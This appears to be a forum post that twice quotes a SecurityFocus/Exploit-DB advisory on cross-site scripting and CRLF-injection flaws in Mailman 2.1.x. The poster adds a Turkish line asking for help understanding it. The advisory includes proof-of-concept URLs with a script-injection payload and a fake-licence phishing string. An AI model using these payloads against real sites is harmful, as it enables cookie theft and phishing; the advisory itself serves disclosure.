source: https://www.securityfocus.com/bid/20021/info
Mailman is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-input. These issues include multiple cross-site scripting vulnerabilities and a CRLF-injection vulnerability.
A successful exploit of these issues could allow an attacker to steal cookie-based authentication credentials, add additional content to the log file, possibly hide current attacks, or launch phishing-style attacks; other attacks may also be possible.
Versions between 2.1.0 and 2.1.8 are vulnerable to this issue; other versions prior to 2.1.0 may also be affected.
http://www.example.com/mailman/admin/mailman/members?findmember="><script>alert(0);</script><x y=" http://www.example.com/mailman/edithtml/tests/listinfo.html?html_code=
XSS%20demo
http://www.example.com/mailman/list...ailman license has expired. Please obtain an% 20upgrade%20at%20www.phishme.site
----------------------------------------------------------------------------------------------
exploit-db de bunlar yazıyor fakat ben birşey anlamadım anlayan varsa
Mailman is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-input. These issues include multiple cross-site scripting vulnerabilities and a CRLF-injection vulnerability.
A successful exploit of these issues could allow an attacker to steal cookie-based authentication credentials, add additional content to the log file, possibly hide current attacks, or launch phishing-style attacks; other attacks may also be possible.
Versions between 2.1.0 and 2.1.8 are vulnerable to this issue; other versions prior to 2.1.0 may also be affected.
http://www.example.com/mailman/admin/mailman/members?findmember="><script>alert(0);</script><x y=" http://www.example.com/mailman/edithtml/tests/listinfo.html?html_code=
XSS%20demo
http://www.example.com/mailman/list...ailman license has expired. Please obtain an% 20upgrade%20at%20www.phishme.site
----------------------------------------------------------------------------------------------
exploit-db de bunlar yazıyor fakat ben birşey anlamadım anlayan varsa
